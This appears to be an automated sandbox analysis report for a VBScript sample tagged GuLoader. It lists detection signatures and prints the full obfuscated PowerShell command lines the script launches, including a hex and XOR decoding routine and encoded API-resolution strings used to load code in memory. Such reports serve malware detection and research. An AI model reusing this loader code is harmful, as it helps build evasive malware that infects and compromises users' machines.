Windows Analysis Report
TT_COPY.vbs

Overview

General Information

Sample Name: TT_COPY.vbs
Analysis ID: 758166
MD5: a27bc40b7cf1e7e7e7a9b38221d4e849
SHA1: d24c19f3cf76f8f47fa6fffb12422f0fa0252b3b
SHA256: 28a30c25fb101ed42b050c4b82777929b1cdd9fe02f8f386bb9708d3adb3b9bf
Tags: GuLoadervbs
Infos:

Detection

Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

VBScript performs obfuscated calls to suspicious functions
Potential evasive VBS script found (use of timer() function in loop)
Obfuscated command line found
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Very long command line found
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Java / VBScript file with very long strings (likely obfuscated code)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Contains functionality to detect virtual machines (SLDT)
Detected potential crypto function
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Abnormal high CPU Usage
Enables debug privileges

Classification

Source: powershell.exe, 0000000A.00000002.835932253.0000025FCBA3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 0000000A.00000002.763919081.0000025FB35C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

System Summary
barindex
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vildmnd = """SaFLauConFacGatUniStoUnnLi suSSemLeeAurGltIneFrnAnsFrbAnaCarIrnPrsre0St To{Ch Ir Al Ud DopCoaSerUsaPemAn(Th[FoSRetHorKoiBonSagSu]In`$NoRAfenoguniHyoOpnMesHapFrlInathnStlVaoIsvUnsel)Bo;Hu In Po Fe Fo`$DiDOceWilMuiUnnPhtBaeHerJuvSyaNalPrlGaeTorKonIfeCosDi No=Br WhNBeetrwKo-FjOKobThjRaeLecCotUn BebStyEntCieKo[cu]Hu Cr(Hy`$mrRDreOagviiMyoBanTvsKvpEklOvaacnFrlSloHovsosPi.SuLAbeNenWagSmtHuhTh No/Be Ze2Co)St;Pe Sk Gt Mi SuFUdomerOm(cr`$ArKUblVaiOvsSetUnrEmiAznTeggeeUnrGu=Al0re;Un Tr`$SpKTjlDriMesAktSurFoiUnnCagMeeSarIc He-FalBrtKa Ac`$TiRWieUdgUdiDeoRanObsSkpRelMiaPrnAnlreoAlvInsfo.BoLTreFanPrgFrtSthDd;Uu Sp`$SyKFolGoiAlsExtinrTriLinUngSkeIcrRe+Fl=Zi2he)Le{Ga Ys Un Pa Pr Te Ta Il Af`$TrDBreNolFoiSenFotCaeBrrduvPeaArlMulIneTrrFonSheHysSa[Re`$ReKOmlPaiDasTrtBurOritenVegDoeDirOp/Sw2Be]Em Gk=Lo Co[PocOnoSunTivUneMarKrtTa]Vi:tr:WiTReoRoBVgyEttWaeDe(Ma`$GrRWheFogTuiAnoNonBysDipLolDeaFonPrlUdoFovGrsUn.PaSFoucobDusBrtForCliMenTugli(Ja`$CeKMelIciAysAftMirGriCinUvgUneStrSe,Fu te2Ho)Ko,Sk Ba1Ti6Va)Fl;Ga Va Ar`$UnDSceKelPiirenFltpeeDorTevStaColFjlTrePerAcnOveDisLa[Ca`$AfKtalIdiKlsCotskrHyiUnnBrgsueAsrte/Mo2Pe]Le Zo=Mi Ne(ne`$PiDsleaulSuiFanmytFjeAnrFevTeaPrlnolKreLurFrnByeThsOb[Ek`$BaKUdltriOrsLatserOsiChnJegSkeThrSp/Er2Mu]Bi Be-prbmeximoForGr Es1Sk6St5Fr)De;Ar kn Gi An Ma}He Vn[ReSGatakrHaiSinLogOx]fi[TaSmoyCosHatPaeChmOr.unTAleAbxOvtFo.ExEkvnNocAaoMedStiHonAsgBo]No:Bi:TiADiSBeCGrILaIHu.raGCoeVitKoSVatprrUniLanSugHa(Ec`$MaDExeKvlFaiFlnBatEnePorssvFuaJalInlIneGorExnBieWhsAn)Eq;Pa}St`$RiFUpoKorsksInkMinVeiFanDugMesrerLieBrsOvuRelHotIdaUrtDieKtrDesfa0In=SiSHimUfecergotafePrnknsvibHeaHyrEknmissi0Fi Dr'MeFSv6AfDSnCfaDSu6SuDVe1InCHj0AfCUn8Da8UdBBvCMa1BaCre9VaCOr9Sa'Un;Al`$LiFodoKerHosLikConHuiTrnSpgDoslarSueEjsTeuTelVetBiaGrtReeOvransLe1Wa=OuSLumMoeUrrBrtUmeKanHyspobMuaWirInnAnsNo0Br No'UdEAn8KoCRuCUnCdo6TrDWo7cuCcuAFaDha6LyCDiAUnCNe3KrDCa1ma8FlBImFDi2DdCDyCSaCGrBSe9Am6Ch9Ok7Re8grBskFhu0ReCFiBMoDDi6NaCCo4SkCUn3HiCBr0KeETrBPoCSh4GrDRe1AnCBoCYnDSo3MiCAf0SaEUn8SaCTo0TiDCo1ScCZoDNoCFlAMeCut1KoDSe6Bo'Sq;Gr`$FiFDooStrnosKokIdnCoiblnSkgJosSprDaeTssTeuUnlSttSvaPrtHoeChrHysDi2Ny=PoSUmmPeeKnrqutCleHonidsFobFoaPrrUnnKosPo0Ra Ve'TrEPa2ImCRe0spDpr1VaFCa5TeDPa7lyCBrAHeCSi6DiEIr4VaCFr1DaCVa1UpDDu7TeCGy0hoDRe6UdDSu6De'Me;Ud`$GrFTeolerLusCukClnRaiSanHagcisCyrBeeDesVauSylFotSkaAntmueSarUdsEt3La=RaSStmEkeSkrSatHueSunTrsInbBeaHerRonFosKu0He Co'FrFRe6slDMeCFoDin6BeDOp1ToCBu0CoCUl8Gu8MeBUnFCo7OpDMo0MaCWeBJaDVi1plCJoCArCSh8BaCSt0nu8CoBMeEReCDiCFeBTaDLy1soCOm0EuDAf7ReCSuAtoDDh5brFVa6PsCIn0FeDDi7maDBa3KaCChCReCMe6FlCde0UiDHu6Re8ReBGeEseDBaCSp4KlCStBryCca1SkCfr9DaCke0EsFMi7UnCdu0PrCAs3hf'Gr;De`$PoFChoMirPesDikFlnIniBanovgSasMarKaeGrsBeuValFotFraTrtHieAlrStsKl4Da=FoSnomfjegorSvtGreBunKasLgbSparorUnnSosIn0Al Gr'JoDAd6enDSe1PeDch7DiCPrCAmCSyBFrCPi2Mu'Ra;We`$IrFBroLurSusCoktonFeiAnnNogTasMirpieLiscauTalExtKaaSptDoeunrSisIr5Do=OcSMimBaeStrRetLteSonFusUdbGraMurFonMosDr0M
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vildmnd = """SaFLauConFacGatUniStoUnnLi suSSemLeeAurGltIneFrnAnsFrbAnaCarIrnPrsre0St To{Ch Ir Al Ud DopCoaSerUsaPemAn(Th[FoSRetHorKoiBonSagSu]In`$NoRAfenoguniHyoOpnMesHapFrlInathnStlVaoIsvUnsel)Bo;Hu In Po Fe Fo`$DiDOceWilMuiUnnPhtBaeHerJuvSyaNalPrlGaeTorKonIfeCosDi No=Br WhNBeetrwKo-FjOKobThjRaeLecCotUn BebStyEntCieKo[cu]Hu Cr(Hy`$mrRDreOagviiMyoBanTvsKvpEklOvaacnFrlSloHovsosPi.SuLAbeNenWagSmtHuhTh No/Be Ze2Co)St;Pe Sk Gt Mi SuFUdomerOm(cr`$ArKUblVaiOvsSetUnrEmiAznTeggeeUnrGu=Al0re;Un Tr`$SpKTjlDriMesAktSurFoiUnnCagMeeSarIc He-FalBrtKa Ac`$TiRWieUdgUdiDeoRanObsSkpRelMiaPrnAnlreoAlvInsfo.BoLTreFanPrgFrtSthDd;Uu Sp`$SyKFolGoiAlsExtinrTriLinUngSkeIcrRe+Fl=Zi2he)Le{Ga Ys Un Pa Pr Te Ta Il Af`$TrDBreNolFoiSenFotCaeBrrduvPeaArlMulIneTrrFonSheHysSa[Re`$ReKOmlPaiDasTrtBurOritenVegDoeDirOp/Sw2Be]Em Gk=Lo Co[PocOnoSunTivUneMarKrtTa]Vi:tr:WiTReoRoBVgyEttWaeDe(Ma`$GrRWheFogTuiAnoNonBysDipLolDeaFonPrlUdoFovGrsUn.PaSFoucobDusBrtForCliMenTugli(Ja`$CeKMelIciAysAftMirGriCinUvgUneStrSe,Fu te2Ho)Ko,Sk Ba1Ti6Va)Fl;Ga Va Ar`$UnDSceKelPiirenFltpeeDorTevStaColFjlTrePerAcnOveDisLa[Ca`$AfKtalIdiKlsCotskrHyiUnnBrgsueAsrte/Mo2Pe]Le Zo=Mi Ne(ne`$PiDsleaulSuiFanmytFjeAnrFevTeaPrlnolKreLurFrnByeThsOb[Ek`$BaKUdltriOrsLatserOsiChnJegSkeThrSp/Er2Mu]Bi Be-prbmeximoForGr Es1Sk6St5Fr)De;Ar kn Gi An Ma}He Vn[ReSGatakrHaiSinLogOx]fi[TaSmoyCosHatPaeChmOr.unTAleAbxOvtFo.ExEkvnNocAaoMedStiHonAsgBo]No:Bi:TiADiSBeCGrILaIHu.raGCoeVitKoSVatprrUniLanSugHa(Ec`$MaDExeKvlFaiFlnBatEnePorssvFuaJalInlIneGorExnBieWhsAn)Eq;Pa}St`$RiFUpoKorsksInkMinVeiFanDugMesrerLieBrsOvuRelHotIdaUrtDieKtrDesfa0In=SiSHimUfecergotafePrnknsvibHeaHyrEknmissi0Fi Dr'MeFSv6AfDSnCfaDSu6SuDVe1InCHj0AfCUn8Da8UdBBvCMa1BaCre9VaCOr9Sa'Un;Al`$LiFodoKerHosLikConHuiTrnSpgDoslarSueEjsTeuTelVetBiaGrtReeOvransLe1Wa=OuSLumMoeUrrBrtUmeKanHyspobMuaWirInnAnsNo0Br No'UdEAn8KoCRuCUnCdo6TrDWo7cuCcuAFaDha6LyCDiAUnCNe3KrDCa1ma8FlBImFDi2DdCDyCSaCGrBSe9Am6Ch9Ok7Re8grBskFhu0ReCFiBMoDDi6NaCCo4SkCUn3HiCBr0KeETrBPoCSh4GrDRe1AnCBoCYnDSo3MiCAf0SaEUn8SaCTo0TiDCo1ScCZoDNoCFlAMeCut1KoDSe6Bo'Sq;Gr`$FiFDooStrnosKokIdnCoiblnSkgJosSprDaeTssTeuUnlSttSvaPrtHoeChrHysDi2Ny=PoSUmmPeeKnrqutCleHonidsFobFoaPrrUnnKosPo0Ra Ve'TrEPa2ImCRe0spDpr1VaFCa5TeDPa7lyCBrAHeCSi6DiEIr4VaCFr1DaCVa1UpDDu7TeCGy0hoDRe6UdDSu6De'Me;Ud`$GrFTeolerLusCukClnRaiSanHagcisCyrBeeDesVauSylFotSkaAntmueSarUdsEt3La=RaSStmEkeSkrSatHueSunTrsInbBeaHerRonFosKu0He Co'FrFRe6slDMeCFoDin6BeDOp1ToCBu0CoCUl8Gu8MeBUnFCo7OpDMo0MaCWeBJaDVi1plCJoCArCSh8BaCSt0nu8CoBMeEReCDiCFeBTaDLy1soCOm0EuDAf7ReCSuAtoDDh5brFVa6PsCIn0FeDDi7maDBa3KaCChCReCMe6FlCde0UiDHu6Re8ReBGeEseDBaCSp4KlCStBryCca1SkCfr9DaCke0EsFMi7UnCdu0PrCAs3hf'Gr;De`$PoFChoMirPesDikFlnIniBanovgSasMarKaeGrsBeuValFotFraTrtHieAlrStsKl4Da=FoSnomfjegorSvtGreBunKasLgbSparorUnnSosIn0Al Gr'JoDAd6enDSe1PeDch7DiCPrCAmCSyBFrCPi2Mu'Ra;We`$IrFBroLurSusCoktonFeiAnnNogTasMirpieLiscauTalExtKaaSptDoeunrSisIr5Do=OcSMimBaeStrRetLteSonFusUdbGraMurFonMosDr0M Jump to behavior
Potential malicious VBS script found (suspicious strings)
Source: Initial file: Impi11.ShellExecute Skyler, " " & chrw(34) + Ce8 + chrw(34), "", "", 0
Very long command line found
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 21279
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 6954
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 21279 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 6954 Jump to behavior
Java / VBScript file with very long strings (likely obfuscated code)
Source: TT_COPY.vbs Initial sample: Strings found which are bigger than 50
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFDC3F80EFD 10_2_00007FFDC3F80EFD
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process Stats: CPU usage > 98%
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TT_COPY.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vildmnd = """SaFLauConFacGatUniStoUnnLi suSSemLeeAurGltIneFrnAnsFrbAnaCarIrnPrsre0St To{Ch Ir Al Ud DopCoaSerUsaPemAn(Th[FoSRetHorKoiBonSagSu]In`$NoRAfenoguniHyoOpnMesHapFrlInathnStlVaoIsvUnsel)Bo;Hu In Po Fe Fo`$DiDOceWilMuiUnnPhtBaeHerJuvSyaNalPrlGaeTorKonIfeCosDi No=Br WhNBeetrwKo-FjOKobThjRaeLecCotUn BebStyEntCieKo[cu]Hu Cr(Hy`$mrRDreOagviiMyoBanTvsKvpEklOvaacnFrlSloHovsosPi.SuLAbeNenWagSmtHuhTh No/Be Ze2Co)St;Pe Sk Gt Mi SuFUdomerOm(cr`$ArKUblVaiOvsSetUnrEmiAznTeggeeUnrGu=Al0re;Un Tr`$SpKTjlDriMesAktSurFoiUnnCagMeeSarIc He-FalBrtKa Ac`$TiRWieUdgUdiDeoRanObsSkpRelMiaPrnAnlreoAlvInsfo.BoLTreFanPrgFrtSthDd;Uu Sp`$SyKFolGoiAlsExtinrTriLinUngSkeIcrRe+Fl=Zi2he)Le{Ga Ys Un Pa Pr Te Ta Il Af`$TrDBreNolFoiSenFotCaeBrrduvPeaArlMulIneTrrFonSheHysSa[Re`$ReKOmlPaiDasTrtBurOritenVegDoeDirOp/Sw2Be]Em Gk=Lo Co[PocOnoSunTivUneMarKrtTa]Vi:tr:WiTReoRoBVgyEttWaeDe(Ma`$GrRWheFogTuiAnoNonBysDipLolDeaFonPrlUdoFovGrsUn.PaSFoucobDusBrtForCliMenTugli(Ja`$CeKMelIciAysAftMirGriCinUvgUneStrSe,Fu te2Ho)Ko,Sk Ba1Ti6Va)Fl;Ga Va Ar`$UnDSceKelPiirenFltpeeDorTevStaColFjlTrePerAcnOveDisLa[Ca`$AfKtalIdiKlsCotskrHyiUnnBrgsueAsrte/Mo2Pe]Le Zo=Mi Ne(ne`$PiDsleaulSuiFanmytFjeAnrFevTeaPrlnolKreLurFrnByeThsOb[Ek`$BaKUdltriOrsLatserOsiChnJegSkeThrSp/Er2Mu]Bi Be-prbmeximoForGr Es1Sk6St5Fr)De;Ar kn Gi An Ma}He Vn[ReSGatakrHaiSinLogOx]fi[TaSmoyCosHatPaeChmOr.unTAleAbxOvtFo.ExEkvnNocAaoMedStiHonAsgBo]No:Bi:TiADiSBeCGrILaIHu.raGCoeVitKoSVatprrUniLanSugHa(Ec`$MaDExeKvlFaiFlnBatEnePorssvFuaJalInlIneGorExnBieWhsAn)Eq;Pa}St`$RiFUpoKorsksInkMinVeiFanDugMesrerLieBrsOvuRelHotIdaUrtDieKtrDesfa0In=SiSHimUfecergotafePrnknsvibHeaHyrEknmissi0Fi Dr'MeFSv6AfDSnCfaDSu6SuDVe1InCHj0AfCUn8Da8UdBBvCMa1BaCre9VaCOr9Sa'Un;Al`$LiFodoKerHosLikConHuiTrnSpgDoslarSueEjsTeuTelVetBiaGrtReeOvransLe1Wa=OuSLumMoeUrrBrtUmeKanHyspobMuaWirInnAnsNo0Br No'UdEAn8KoCRuCUnCdo6TrDWo7cuCcuAFaDha6LyCDiAUnCNe3KrDCa1ma8FlBImFDi2DdCDyCSaCGrBSe9Am6Ch9Ok7Re8grBskFhu0ReCFiBMoDDi6NaCCo4SkCUn3HiCBr0KeETrBPoCSh4GrDRe1AnCBoCYnDSo3MiCAf0SaEUn8SaCTo0TiDCo1ScCZoDNoCFlAMeCut1KoDSe6Bo'Sq;Gr`$FiFDooStrnosKokIdnCoiblnSkgJosSprDaeTssTeuUnlSttSvaPrtHoeChrHysDi2Ny=PoSUmmPeeKnrqutCleHonidsFobFoaPrrUnnKosPo0Ra Ve'TrEPa2ImCRe0spDpr1VaFCa5TeDPa7lyCBrAHeCSi6DiEIr4VaCFr1DaCVa1UpDDu7TeCGy0hoDRe6UdDSu6De'Me;Ud`$GrFTeolerLusCukClnRaiSanHagcisCyrBeeDesVauSylFotSkaAntmueSarUdsEt3La=RaSStmEkeSkrSatHueSunTrsInbBeaHerRonFosKu0He Co'FrFRe6slDMeCFoDin6BeDOp1ToCBu0CoCUl8Gu8MeBUnFCo7OpDMo0MaCWeBJaDVi1plCJoCArCSh8BaCSt0nu8CoBMeEReCDiCFeBTaDLy1soCOm0EuDAf7ReCSuAtoDDh5brFVa6PsCIn0FeDDi7maDBa3KaCChCReCMe6FlCde0UiDHu6Re8ReBGeEseDBaCSp4KlCStBryCca1SkCfr9DaCke0EsFMi7UnCdu0PrCAs3hf'Gr;De`$PoFChoMirPesDikFlnIniBanovgSasMarKaeGrsBeuValFotFraTrtHieAlrStsKl4Da=FoSnomfjegorSvtGreBunKasLgbSparorUnnSosIn0Al Gr'JoDAd6enDSe1PeDch7DiCPrCAmCSyBFrCPi2Mu'Ra;We`$IrFBroLurSusCoktonFeiAnnNogTasMirpieLiscauTalExtKaaSptDoeunrSisIr5Do=OcSMimBaeStrRetLteSonFusUdbGraMurFonMosDr0M
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Smertensbarns0 { param([String]$Regionsplanlovs); $Delintervallernes = New-Object byte[] ($Regionsplanlovs.Length / 2); For($Klistringer=0; $Klistringer -lt $Regionsplanlovs.Length; $Klistringer+=2){ $Delintervallernes[$Klistringer/2] = [convert]::ToByte($Regionsplanlovs.Substring($Klistringer, 2), 16); $Delintervallernes[$Klistringer/2] = ($Delintervallernes[$Klistringer/2] -bxor 165); } [String][System.Text.Encoding]::ASCII.GetString($Delintervallernes);}$Forskningsresultaters0=Smertensbarns0 'F6DCD6D1C0C88BC1C9C9';$Forskningsresultaters1=Smertensbarns0 'E8CCC6D7CAD6CAC3D18BF2CCCB96978BF0CBD6C4C3C0EBC4D1CCD3C0E8C0D1CDCAC1D6';$Forskningsresultaters2=Smertensbarns0 'E2C0D1F5D7CAC6E4C1C1D7C0D6D6';$Forskningsresultaters3=Smertensbarns0 'F6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C3';$Forskningsresultaters4=Smertensbarns0 'D6D1D7CCCBC2';$Forskningsresultaters5=Smertensbarns0 'E2C0D1E8CAC1D0C9C0EDC4CBC1C9C0';$Forskningsresultaters6=Smertensbarns0 'F7F1F6D5C0C6CCC4C9EBC4C8C08985EDCCC1C0E7DCF6CCC28985F5D0C7C9CCC6';$Forskningsresultaters7=Smertensbarns0 'F7D0CBD1CCC8C08985E8C4CBC4C2C0C1';$Forskningsresultaters8=Smertensbarns0 'F7C0C3C9C0C6D1C0C1E1C0C9C0C2C4D1C0';$Forskningsresultaters9=Smertensbarns0 'ECCBE8C0C8CAD7DCE8CAC1D0C9C0';$Ghegish0=Smertensbarns0 'E8DCE1C0C9C0C2C4D1C0F1DCD5C0';$Ghegish1=Smertensbarns0 'E6C9C4D6D68985F5D0C7C9CCC68985F6C0C4C9C0C18985E4CBD6CCE6C9C4D6D68985E4D0D1CAE6C9C4D6D6';$Ghegish2=Smertensbarns0 'ECCBD3CACEC0';$Ghegish3=Smertensbarns0 'F5D0C7C9CCC68985EDCCC1C0E7DCF6CCC28985EBC0D2F6C9CAD18985F3CCD7D1D0C4C9';$Ghegish4=Smertensbarns0 'F3CCD7D1D0C4C9E4C9C9CAC6';$Ghegish5=Smertensbarns0 'CBD1C1C9C9';$Ghegish6=Smertensbarns0 'EBD1F5D7CAD1C0C6D1F3CCD7D1D0C4C9E8C0C8CAD7DC';$Ghegish7=Smertensbarns0 'ECE0FD';$Ghegish8=Smertensbarns0 'F9';function fkp {Param ($Upgrown, $Depressionsperioder) ;$Hoeres0 =Smertensbarns0 '81EED7C8C8C0D7C0CB8598858DFEE4D5D5E1CAC8C4CCCBF89F9FE6D0D7D7C0CBD1E1CAC8C4CCCB8BE2C0D1E4D6D6C0C8C7C9CCC0D68D8C85D985F2CDC0D7C088EAC7CFC0C6D185DE8581FA8BE2C9CAC7C4C9E4D6D6C0C8C7C9DCE6C4C6CDC08588E4CBC18581FA8BE9CAC6C4D1CCCACB8BF6D5C9CCD18D81E2CDC0C2CCD6CD9D8CFE8894F88BE0D4D0C4C9D68D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6958C85D88C8BE2C0D1F1DCD5C08D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6948C';&($Ghegish7) $Hoeres0;$Hoeres5 = Smertensbarns0 '81E6CDCCC9C985988581EED7C8C8C0D7C0CB8BE2C0D1E8C0D1CDCAC18D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6978985FEF1DCD5C0FEF8F885E58D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D696898581E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6918C8C';&($Ghegish7) $Hoeres5;$Hoeres1 = Smertensbarns0 'D7C0D1D0D7CB8581E6CDCCC9C98BECCBD3CACEC08D81CBD0C9C98985E58DFEF6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C3F88DEBC0D288EAC7CFC0C6D185F6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CC
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vildmnd = """SaFLauConFacGatUniStoUnnLi suSSemLeeAurGltIneFrnAnsFrbAnaCarIrnPrsre0St To{Ch Ir Al Ud DopCoaSerUsaPemAn(Th[FoSRetHorKoiBonSagSu]In`$NoRAfenoguniHyoOpnMesHapFrlInathnStlVaoIsvUnsel)Bo;Hu In Po Fe Fo`$DiDOceWilMuiUnnPhtBaeHerJuvSyaNalPrlGaeTorKonIfeCosDi No=Br WhNBeetrwKo-FjOKobThjRaeLecCotUn BebStyEntCieKo[cu]Hu Cr(Hy`$mrRDreOagviiMyoBanTvsKvpEklOvaacnFrlSloHovsosPi.SuLAbeNenWagSmtHuhTh No/Be Ze2Co)St;Pe Sk Gt Mi SuFUdomerOm(cr`$ArKUblVaiOvsSetUnrEmiAznTeggeeUnrGu=Al0re;Un Tr`$SpKTjlDriMesAktSurFoiUnnCagMeeSarIc He-FalBrtKa Ac`$TiRWieUdgUdiDeoRanObsSkpRelMiaPrnAnlreoAlvInsfo.BoLTreFanPrgFrtSthDd;Uu Sp`$SyKFolGoiAlsExtinrTriLinUngSkeIcrRe+Fl=Zi2he)Le{Ga Ys Un Pa Pr Te Ta Il Af`$TrDBreNolFoiSenFotCaeBrrduvPeaArlMulIneTrrFonSheHysSa[Re`$ReKOmlPaiDasTrtBurOritenVegDoeDirOp/Sw2Be]Em Gk=Lo Co[PocOnoSunTivUneMarKrtTa]Vi:tr:WiTReoRoBVgyEttWaeDe(Ma`$GrRWheFogTuiAnoNonBysDipLolDeaFonPrlUdoFovGrsUn.PaSFoucobDusBrtForCliMenTugli(Ja`$CeKMelIciAysAftMirGriCinUvgUneStrSe,Fu te2Ho)Ko,Sk Ba1Ti6Va)Fl;Ga Va Ar`$UnDSceKelPiirenFltpeeDorTevStaColFjlTrePerAcnOveDisLa[Ca`$AfKtalIdiKlsCotskrHyiUnnBrgsueAsrte/Mo2Pe]Le Zo=Mi Ne(ne`$PiDsleaulSuiFanmytFjeAnrFevTeaPrlnolKreLurFrnByeThsOb[Ek`$BaKUdltriOrsLatserOsiChnJegSkeThrSp/Er2Mu]Bi Be-prbmeximoForGr Es1Sk6St5Fr)De;Ar kn Gi An Ma}He Vn[ReSGatakrHaiSinLogOx]fi[TaSmoyCosHatPaeChmOr.unTAleAbxOvtFo.ExEkvnNocAaoMedStiHonAsgBo]No:Bi:TiADiSBeCGrILaIHu.raGCoeVitKoSVatprrUniLanSugHa(Ec`$MaDExeKvlFaiFlnBatEnePorssvFuaJalInlIneGorExnBieWhsAn)Eq;Pa}St`$RiFUpoKorsksInkMinVeiFanDugMesrerLieBrsOvuRelHotIdaUrtDieKtrDesfa0In=SiSHimUfecergotafePrnknsvibHeaHyrEknmissi0Fi Dr'MeFSv6AfDSnCfaDSu6SuDVe1InCHj0AfCUn8Da8UdBBvCMa1BaCre9VaCOr9Sa'Un;Al`$LiFodoKerHosLikConHuiTrnSpgDoslarSueEjsTeuTelVetBiaGrtReeOvransLe1Wa=OuSLumMoeUrrBrtUmeKanHyspobMuaWirInnAnsNo0Br No'UdEAn8KoCRuCUnCdo6TrDWo7cuCcuAFaDha6LyCDiAUnCNe3KrDCa1ma8FlBImFDi2DdCDyCSaCGrBSe9Am6Ch9Ok7Re8grBskFhu0ReCFiBMoDDi6NaCCo4SkCUn3HiCBr0KeETrBPoCSh4GrDRe1AnCBoCYnDSo3MiCAf0SaEUn8SaCTo0TiDCo1ScCZoDNoCFlAMeCut1KoDSe6Bo'Sq;Gr`$FiFDooStrnosKokIdnCoiblnSkgJosSprDaeTssTeuUnlSttSvaPrtHoeChrHysDi2Ny=PoSUmmPeeKnrqutCleHonidsFobFoaPrrUnnKosPo0Ra Ve'TrEPa2ImCRe0spDpr1VaFCa5TeDPa7lyCBrAHeCSi6DiEIr4VaCFr1DaCVa1UpDDu7TeCGy0hoDRe6UdDSu6De'Me;Ud`$GrFTeolerLusCukClnRaiSanHagcisCyrBeeDesVauSylFotSkaAntmueSarUdsEt3La=RaSStmEkeSkrSatHueSunTrsInbBeaHerRonFosKu0He Co'FrFRe6slDMeCFoDin6BeDOp1ToCBu0CoCUl8Gu8MeBUnFCo7OpDMo0MaCWeBJaDVi1plCJoCArCSh8BaCSt0nu8CoBMeEReCDiCFeBTaDLy1soCOm0EuDAf7ReCSuAtoDDh5brFVa6PsCIn0FeDDi7maDBa3KaCChCReCMe6FlCde0UiDHu6Re8ReBGeEseDBaCSp4KlCStBryCca1SkCfr9DaCke0EsFMi7UnCdu0PrCAs3hf'Gr;De`$PoFChoMirPesDikFlnIniBanovgSasMarKaeGrsBeuValFotFraTrtHieAlrStsKl4Da=FoSnomfjegorSvtGreBunKasLgbSparorUnnSosIn0Al Gr'JoDAd6enDSe1PeDch7DiCPrCAmCSyBFrCPi2Mu'Ra;We`$IrFBroLurSusCoktonFeiAnnNogTasMirpieLiscauTalExtKaaSptDoeunrSisIr5Do=OcSMimBaeStrRetLteSonFusUdbGraMurFonMosDr0M Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Smertensbarns0 { param([String]$Regionsplanlovs); $Delintervallernes = New-Object byte[] ($Regionsplanlovs.Length / 2); For($Klistringer=0; $Klistringer -lt $Regionsplanlovs.Length; $Klistringer+=2){ $Delintervallernes[$Klistringer/2] = [convert]::ToByte($Regionsplanlovs.Substring($Klistringer, 2), 16); $Delintervallernes[$Klistringer/2] = ($Delintervallernes[$Klistringer/2] -bxor 165); } [String][System.Text.Encoding]::ASCII.GetString($Delintervallernes);}$Forskningsresultaters0=Smertensbarns0 'F6DCD6D1C0C88BC1C9C9';$Forskningsresultaters1=Smertensbarns0 'E8CCC6D7CAD6CAC3D18BF2CCCB96978BF0CBD6C4C3C0EBC4D1CCD3C0E8C0D1CDCAC1D6';$Forskningsresultaters2=Smertensbarns0 'E2C0D1F5D7CAC6E4C1C1D7C0D6D6';$Forskningsresultaters3=Smertensbarns0 'F6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C3';$Forskningsresultaters4=Smertensbarns0 'D6D1D7CCCBC2';$Forskningsresultaters5=Smertensbarns0 'E2C0D1E8CAC1D0C9C0EDC4CBC1C9C0';$Forskningsresultaters6=Smertensbarns0 